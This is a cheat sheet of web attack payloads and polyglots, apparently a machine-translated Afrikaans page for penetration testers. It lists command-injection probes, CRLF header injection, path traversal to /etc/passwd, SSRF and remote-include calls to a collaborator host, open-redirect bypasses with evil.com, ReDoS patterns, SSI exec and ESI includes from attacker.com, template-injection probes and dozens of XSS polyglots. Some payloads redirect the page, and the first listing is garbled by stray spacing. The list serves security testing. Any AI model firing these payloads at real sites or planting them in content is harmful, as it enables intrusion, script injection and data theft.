Die doel van hierdie PoCs en Polygloths is om die toetsers 'n vinnige opsomming van kwesbaarhede te gee wat hulle mag benut as hul invoer op een of ander manier in die antwoord weerspieël word .
Hierdie cheatsheet stel nie 'n omvattende lys van toetse vir elke kwesbaarheid voor nie , net 'n paar basiese. As jy op soek is na meer omvattende toetse, toegang tot elke voorgestelde kwesbaarheid.
Jy sal nie Content-Type afhanklike inspuitings soos XXE vind nie , aangesien jy gewoonlik self probeer as jy 'n versoek vind wat xml-data stuur. Jy sal ook nie databasisinspuitings hier vind nie , aangesien dit, selfs al kan sommige inhoud weerspieël word, sterk afhanklik is van die backend DB-tegnologie en -struktuur.
Polygloths lys
Copy {{ 7 * 7 }} [ 7 * 7 ]
1 ;sleep$ { IFS } 9 ; #${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/* $(sleep 5 )`sleep 5 `` */- sleep ( 5 ) - '/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||" /* ` */
% 0d % 0aLocation : % 20http : // attacker . com
% 3f % 0d % 0aLocation : % 0d % 0aContent - Type : text / html % 0d % 0aX - XSS - Protection % 3a0 % 0d % 0a % 0d % 0a % 3Cscript % 3Ealert % 28document . domain % 29 % 3C / script % 3E
% 3f % 0D % 0ALocation : // x : 1 % 0D % 0AContent - Type : text / html % 0D % 0AX - XSS - Protection % 3a0 % 0D % 0A % 0D % 0A % 3Cscript % 3Ealert(document . domain) % 3C / script % 3E
% 0d % 0aContent - Length : % 200 % 0d % 0a % 0d % 0aHTTP / 1.1 % 20200 % 20OK % 0d % 0aContent - Type : % 20text / html % 0d % 0aContent - Length : % 2025 % 0d % 0a % 0d % 0a % 3Cscript % 3Ealert( 1 ) % 3C / script % 3E
< br >< b >< h1 > THIS IS AND INJECTED TITLE </ h1 >
/ etc / passwd
. . / . . / . . / . . / . . / . . / etc / hosts
. .\ ..\..\..\..\..\etc/hosts
/ etc / hostname
. . / . . / . . / . . / . . / . . / etc / hosts
C : / windows / system32 / drivers / etc / hosts
. . / . . / . . / . . / . . / . . / windows / system32 / drivers / etc / hosts
. .\ ..\..\..\..\..\windows/system32/drivers/etc/hosts
http : // asdasdasdasd . burpcollab . com / mal . php
\ \asdasdasdasd.burpcollab.com/mal.php
www . whitelisted . com
www . whitelisted . com . evil . com
https : // google . com
// google . com
javascript : alert ( 1 )
( \ \w*)+$
([a - zA - Z] + ) * $
((a + ) + ) + $
< !-- #echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{ 7 * 7 }} $ { 7 * 7 } <% = 7 * 7 %> $ {{ 7 * 7 }} #{7*7}${{<%[%'"}}%\
< xsl : value - of select= "system-property('xsl:version')" />< esi : include src= "http://10.10.10.10/data/news.xml" stylesheet= "http://10.10.10.10//news_template.xsl" ></ esi : include >
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript : alert ()
javascript : "/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-- > '"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></ plaintext \ ></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//' ; alert (String. fromCharCode ( 88 , 83 , 83 )) // ";alert(String.fromCharCode (88,83,83))//" ; alert (String. fromCharCode ( 88 , 83 , 83 )) // -- ></ SCRIPT > ">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
Basiese Toetse
Polygloths
Basiese Toetse
Copy ; ls
|| ls ;
| ls ;
&& ls ;
& ls ;
%0Als
` ls `
$(ls )
Polygloths
Copy 1 ; sleep$ {IFS} 9 ;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5 ) ` sleep 5 `` * /-sleep( 5 )-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/ * ` * /
Basiese Toetse
Copy %0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain )%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1 )%3C/script%3E
Hangende Merk
Basiese Toetse
Copy <br><b><h1>THIS IS AND INJECTED TITLE </h1>
Basiese Toetse
Copy /etc/passwd
. ./ . ./ . ./ . ./ . ./ . ./etc/hosts
.. \ .. \ .. \ .. \ .. \ .. \ etc/hosts
/etc/hostname
. ./ . ./ . ./ . ./ . ./ . ./etc/hosts
C:/windows/system32/drivers/etc/hosts
. ./ . ./ . ./ . ./ . ./ . ./windows/system32/drivers/etc/hosts
.. \ .. \ .. \ .. \ .. \ .. \ windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
Basiese Toetse
Copy www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1 )
Basiese Toetse
Copy ( \\w* ) +$
([a-zA-Z]+) *$
((a + ) + ) + $
Basiese Toetse
Copy <!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Polygloths
Copy <!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Die dieselfde toetse wat vir Open Redirect gebruik word, kan hier gebruik word.
Basiese Toetse
Copy ${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
Polygloths
Copy {{ 7 * 7 }} $ { 7 * 7 } <%= 7 * 7 %> $ {{ 7 * 7 }} #{7*7}${{<%[%'"}}%\
Basiese Toetse
Copy <xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
Polygloths
Copy <xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
XSS
Basiese Toetse
Copy " onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
Polygloths
Copy javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=document.location=`//localhost/mH`//>